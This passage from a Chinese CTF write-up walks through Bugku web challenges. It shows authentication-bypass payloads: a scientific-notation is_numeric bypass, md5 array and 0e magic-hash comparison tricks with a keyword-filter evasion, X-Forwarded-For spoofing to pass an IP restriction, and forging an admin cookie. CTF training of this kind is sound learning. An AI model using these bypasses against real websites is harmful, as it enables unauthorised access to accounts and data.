])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+[]])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]])

输入到上面的输入框,看题目提示应该是要转换为大写再输进去。嘿嘿,我一菜鸟竟然被夸了

提交flag,但这个题目好像有点问题,答案按道理来说应该是这个->”CTF{WHATFK}”,猜想是Bugku的u盘的题目部分还没配置好。所以我这里的正确flag是这个小写的

1
ctf{whatfk}

Web8

这题考到了科学计数法的使用

is_numeric() 检测变量是否为数字或者数字字符串

解释:以GET传参num给变量$num,如果$num为数字或者数字字符串,则打印输入的内容;如果num==1,则返回flag。也就是说num不能等于纯数字,但值要等于1。

解题方法:这题我们可以想到用科学计数法,既不是纯数字,其值也等于1,构造payload:

1
http://192.168.1.98:1027/?num=1e+1-9

拿下flag

1
flag{bugku-789-ps-ssdf}

Web9

网站一直在不停刷新,盲猜背后肯定有无数个alert

禁用javascript脚本

按F12看到网站注释了一些Unicode编码过后的字符串

1
&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125;

解码,得到flag

Web10

这题不难的话还是挺简单的(请忽略我的废话)

有两段url编码后的字符串,以及一个eval语句,先进行url解码

1
2
3
var p1 = 'function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b';
var p2 = 'aa648cf6e87a7114f1"==a.value)return!0;alert("Error");a.focus();return!1}}document.getElementById("levelQuest").onsubmit=checkSubmit;';
eval(unescape(p1) + unescape('54aa2' + p2));

unescape() 函数可对通过 escape() 编码的字符串进行解码。

我们主要看eval的内容,eval的意思是解码 p1 和 p2的内容,然后把它们拼起来(不要漏了’54aa2’),然后我们可以得到以下字符串

1
67d709b2b54aa2aa648cf6e87a7114f1

在输入框输入这串字符串,提交,拿下flag

1
KEY{J22JK-HS11}

Web11

发现只能输入一位数,果断F12修改html代码

拿下flag

1
flag{CTF-bugku-0032}

Web12

闪来闪去的,果断禁用javascript脚本,手动刷新网页直到显示如上图样式,F12查看源代码,拿下flag;

1
flag{dummy_game_1s_s0_popular}

Web13

这种绕过题是我最不擅长的了属于是,解法参考:链接

打开网页发现有一段密文,盲猜md5加密,但现在还没有什么用,dirb扫,扫不出来什么有用的东西。。想到可能是备份文件的题,试试,还真是,得到网站主页源码一份

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php


include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
?>

总体意思是将get的两个参数中的key替换为空(可用kekeyy绕过),对key1,key2的值md5加密后再进行比较,如果md5加密的值一样和未加密的值不同,就输出flag

有两种方法绕过:

1,md5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。

2,利用==比较漏洞

如果两个字符经MD5加密后的值为 0exxxxx形式,就会被认为是科学计数法,且表示的是0*10的xxxx次方,还是零,都是相等的。

下列的字符串的MD5值都是0e开头的:

1
2
3
4
5
6
7
8
9
10
11
QNKCDZO

240610708

s878926199a

s155964671a

s214587387a

s214587387a

这题我用的是第一种解法,因为比较简单点,第二种解法好像解不出这题?构造payload

1
http://192.168.1.98:1032/?kekeyy1[]==1&kekeyy2[]==2

得到flag

1
Bugku{OH_YOU_FIND_MY_MOMY}取得flag

Web14

按F12,发现一段base64加密的密文’dGVzdDEyMw==’,解密得’test123’,盲猜可能是密码,随便输admin,test123,发现IP禁止访问

然后想到用burp抓包,请求头增加:X-Forwarded-For:127.0.0.1,伪造本地登录,拿下flag

Web15

一个小饼干发货系统

注册登录,发现权限不够,抓包看看cookie;发现cookie除开前缀后,后面的用户身份是用md5加密的,将登录用户的md5值改成admin的md5值

拿到flag

1
The flag is: 98112cb20fb17cc81687115010f8a5c3

Web16

这里主要用到re正则表达式,我用的是python的re.search()方法

re.search(正则表达式,字符串,标志位)

标志位修饰符 使匹配对大小写不敏感
re.l 使匹配对大小写不敏感
re.L 做本地化识别(locale-aware)匹配
re.M 多行匹配,影响 ^ 和 $
re.S 使 . 匹配包括换行在内的所有字符
re.U 根据Unicode字符集解析字符。这个标志影响 \w, \W, \b, \B.
re.X 该标志通过给予你更灵活的格式以便你将正则表达式写得更易于理解。
1
2
3
4
5
6
7
8
9
10
11
import re
import requests

s = requests.Session() #Session保持会话
r = s.get("http://192.168.0.16:1035/")
searchObj = re.search(r'^<div>(.*)=\?;</div>$', r.text, re.M | re.S)
d = {
"value": eval(searchObj.group(1)) #eval执行运算,group提取对象中相应的值
}
r = s.post("http://192.168.0.16:1035/", data=d)
print(r.text)

拿下

1
原来你也是老司机 Bugku{YOU_DID_IT_BY_SECOND}

Web17

最后三道题涉及到了md5碰撞等内容,鄙人能力不足,就不放出来了,下次一定